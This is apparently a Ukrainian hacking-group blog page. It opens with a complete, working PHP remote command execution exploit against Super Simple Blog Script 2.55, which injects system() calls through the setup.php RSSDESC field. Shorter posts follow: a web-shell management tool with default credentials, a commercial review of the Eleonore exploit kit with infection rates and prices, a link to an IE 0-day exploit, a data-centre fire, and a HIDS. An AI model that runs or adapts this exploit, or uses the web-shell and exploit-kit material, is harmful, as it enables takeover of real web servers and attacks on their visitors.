Вразливість в даному продукті виникає через недостатню фільтрацію даних. Система після встановлення не попереджає користувача про необхідність видалення файлу setup.php, внаслідок неавторизованого доступу до цього файлу атакуючий має можливість виконати будь-яку команду в системі з правами веб-сервера. Нижче приведений код експлойту.

<?php

/**
 * @author Paketik [UASC.org.ua]
 * @copyright 2010
 * @Super Simple Blog Script Remote Command Execution Exploit
 * @Version 2.55
 * @Vendor www.supersimple.org
 * @Risk Very high
 * @usage exp.php domen path command
 * @example php exp.php http://localhost/SuperSimpleBlogScript ls -la
 */

error_reporting(false);

if(count($argv) < 3) { banner(); } else
{
 echo count($argv) ;
 $command = "";
 for($i=2; $i<count($argv); $i++)
 {
 $command .= $argv[$i] . " ";
 }
 $command = trim($command);
 exploit($argv[1],$command);
 }
function exploit($target,$command)
{
 $rnd = randomtab();
 print "[#] Target: ".$target."\r\n";
 print "[#] Command: ". $command."\r\n";
 print "[#] Generating random table name: ". $rnd."\r\n";
 print "[#] Parsing Full Path ";
 $content = file_get_contents($target."/setup.php");
 $p = getpath($content);
 print $p."\r\n";
 print "[#] Exploiting....\r\n";

 $_data = array("BASEURL" => $p,
 "PAGETITLE"=>"Title",
 "PERPAGE"=>20,
 "BLOGPAGENAME"=>"index",
 "USER0"=>"qaz",
 "PASSWORD0"=>"qaz",
 "IMAGESPERENTRY"=>1,
 "MULTIUSERS"=>"false",
 "COMMENT"=>"true",
 "TABLENAME"=>$rnd,
 "TIMEOFFSET"=>0,
 "RSSDESC"=>"rss'; system('".$command."'); //",
 "url"=>$target,
 "submit"=>"");
 $data = array();
 list($header, $content) = PostRequest($target."/setup.php", $target."setup.php", $_data);
 //print $header;
 if( strpos($header,"success"))
 {
 print "[###] Successful! View result:$target \r\n";
 } else
 {
 print "[---] Exploit Failed   \r\n";
 die();
 }

}

function randomtab()
{
 $a = array("a","b","c","d","e","f","g",1,2,3,4,5,6,7,8,9,0);
 $string = $a[rand(0,16)].$a[rand(0,16)].$a[rand(0,16)].$a[rand(0,16)].$a[rand(0,16)];
 return $string;
}
function PostRequest($url, $referer, $_data) {

 $data = array();
 while(list($n,$v) = each($_data)){
 $data[] = "$n=$v";
 }
 $data = implode('&', $data);

 $url = parse_url($url);
 if ($url['scheme'] != 'http') {
 die('Only HTTP request are supported !');
 }

 $host = $url['host'];
 $path = $url['path'];

 $fp = fsockopen($host, 80);

 fputs($fp, "POST $path HTTP/1.1\r\n");
 fputs($fp, "Host: $host\r\n");
 fputs($fp, "Referer: $referer\r\n");
 fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
 fputs($fp, "Content-length: ". strlen($data) ."\r\n");
 fputs($fp, "Connection: close\r\n\r\n");
 fputs($fp, $data);

 $result = '';
 while(!feof($fp)) {

 $result .= fgets($fp, 128);
 }

 fclose($fp);

 $result = explode("\r\n\r\n", $result, 2);

 $header = isset($result[0]) ? $result[0] : '';
 $content = isset($result[1]) ? $result[1] : '';

 return array($header, $content);
}
function getpath($content)
{
 $a =  preg_match('/BASEURL" value="(.+?)"/i',$content,$m);
 return $m[1];
}

function banner()
{
 print "/**\r\n
 * @author Paketik [UASC.org.ua]\r\n
 * @copyright 2010\r\n
 * @Super Simple Blog Script Remote Command Execution Exploit \r\n
 * @Version 2.55 \r\n
 * @Vendor www.supersimple.org \r\n
 * @Risk Very high\r\n
 * @usage exp.php domen path command\r\n
 * @example php exp.php http://localhost/SuperSimpleBlogScript ls -la  \r\n
 */";
 die();
}
?>

Давно нічого тут не писалось, тому вирішив трохи освіжити блог, та й нагадати начим читачам що ми існуєм). Отож почнем..

Прикупив собі новий ноутбук –  Acer Aspire 5738z. Повинен сказати – просто краса, ноутбук і справді непоганий. У зв’язку з збільшенням квоти на харддиску вирішив завести собі окремий прихований розділ, закриптований trucrypt. Все пройшло чудово, розділ захищений файлом ключів, що замасковані під mp3 файл. Та запускати зажди трукрипт, вибирати розділ, ключі, монтувати мене не приваблювало. Але ця проблема досить легко вирішилась. Як? Читаєм підкатом..

Read more…

madShellC0ntr01 v1.2

Писався софт достатньо давно, та і виключно в цілях ознайомлення Якщо чесно, то я вже навіть не пам’ятаю чи реалізував все що хотів, чи ні (хоча скоріше, що ні). Отже, дозвольте представити вам систему для роботи з великою кількістю веб-шеллів типу madshell.

Меню:

Думаю все інтуїтивно зрозуміло (:

В версії 1.2 система автоматично оприділяє такі параметри:

• Safe Mode
• Platform
• Version
• Country

Стандартна пара логін-пароль: admin:pass

Завантажити

Хочу надати вам інформацію про тестування зв’язки експлойтів  Eleonore exploits pack version 1.2. Написана вона автором Exmanoize. В склад зв’язки входять такі експлойти

Середній пробив характерний для звязки:

• usa: 5-15%
• mix: 10-25%

Ціни:

• Власне зв’язка = 700$
• Чищення від АВ = 50$
• Ребілд на інший домен = 50$

Як не дивно, та в системі присутні вразливості, далі про них.

Read more…

Увечері в суботу 27 березня, близько 21:00 за київським часом на другому поверсі бізнес-центру “Фабрика Бізнесу” за адресою м. Одеса вул. Дальницька, 46, де знаходиться датацентр одного з найбільших на Україні хостинг-провайдерів HOSTING.UA почалася пожежа.

Встановлена в датацентрі система пожежогасіння з нез’ясованих причин не спрацювала. Сигнал від датчиків надійшов на пульт системи пожежогасіння, проте  обладнання не спрацювало. З цієї причини замість належних для датацентрів безводних систем пожежогасіння на основі порошкових або газових сумішах, прибули пожежники використовували наявні в їхньому розпорядженні засоби, що збільшило збиток нанесений серверам у датацентрі. Вікна в датацентрі вибиті в ході заходів з пожежогасіння.

Серверам у ДЦ завдано великої шкоди. Співробітники датацентру не можуть у даний час оцінити його обсяг, хоча стверджують, що частина серверів вціліла. Наскільки це правда – не відомо. Є інформація, що навіть оцінка збитку зможе бути завершена не раніше ніж через тиждень. На поточний момент, вже більше 12 годин, клієнтам хостинг-провайдера до цих пір не надходить жодної офіційної інформації, що підтверджує припущення про значні масштаби збитку.

Фотографія з місця подій:

Нещодавно мною були виявленні численні вразливості на сайті top.blog.net.ua. В той же день про це була повідомлена адміністрація проекту, але, нажаль відповіді я так і не отримав. Сподіваюсь цей пост спонукає їх виправити вразливості. А тепер блище до справи.

Що треба щоб бути в топі?

UA TOP Bloggers визначає позиції сайту за такими показниками:

• Кількість хостів (унікальні користувачі)
• Кількіст хітів (кількість переглядів)

Розглянемо як система реєструє ці дані. Від нас вимагають встановити код кнопки на сайті. Логічно що через нього і проводиться підрахунок. Поглянемо на код:

Все зрозуміло –  картинка генерується скриптом, якому передаються 2 параметри: in,id. Id це і є номер нашого сайту.

Read more…

Експлойт був знайдений на сайті www.topix21century.com. Начинка експлойта завантажувала та виконувала на комп’ютері жертви бінарний файл, який в свою чергу встановлював зєднання з www.topix21century.com.
Наразі вже є готовий експлойт написаний для Metasploit Framework. Успішно спрацював на вказаних продуктах:
– Microsoft Internet Explorer 7, Windows Vista SP2
– Microsoft Internet Explorer 7, Windows XP SP3
– Microsoft Internet Explorer 6, Windows XP SP3

Подивитись вихідний код експлойту.

Експлойт запропонований Moshe Ben Abu (деобфускований та з видаленою malware начинкою):
У звязку з тим, що ESET NOD32 через код сплойту сповіщає що наш блог містить потенційно небезпечний контент – даємо лінк на код експлойту:

http://uasc.org.ua/files/ie6-7exploit.txt

Відео роботи експлойта:

Internet Explorer 0-day Attack from Panda Security on Vimeo.

В журналі “][акер" #134 2010 р. вийшла моя стаття "GOV сайты под угрозой". Далі оригінал статті на російській мові.

GOV сайты под угрозой

Read more…

SALO PACK © UASC

by n0153r, Dimi4

• Даний програмний продукт призначений тільки для освітніх цілей. Використання його в будь-якому іншому
• вигляді може бути розцінено як порушення закону!
• Заборонено продаж і використання вихідного коду SALO PACK в комерційних цілях

Read more…

AntiBdoor є безкоштовною, вузловою СВВ, з відкритим вихідним кодом (Host-based IDS, HIDS). Вона забезпечує аналіз цілісності файлів, виявлення потенційно небезпечних програм, активні заходи у відповідь на загрозу.

Для розробки системи використано технології PHP, SQL, XHTML, CSS, AJAX. Read more…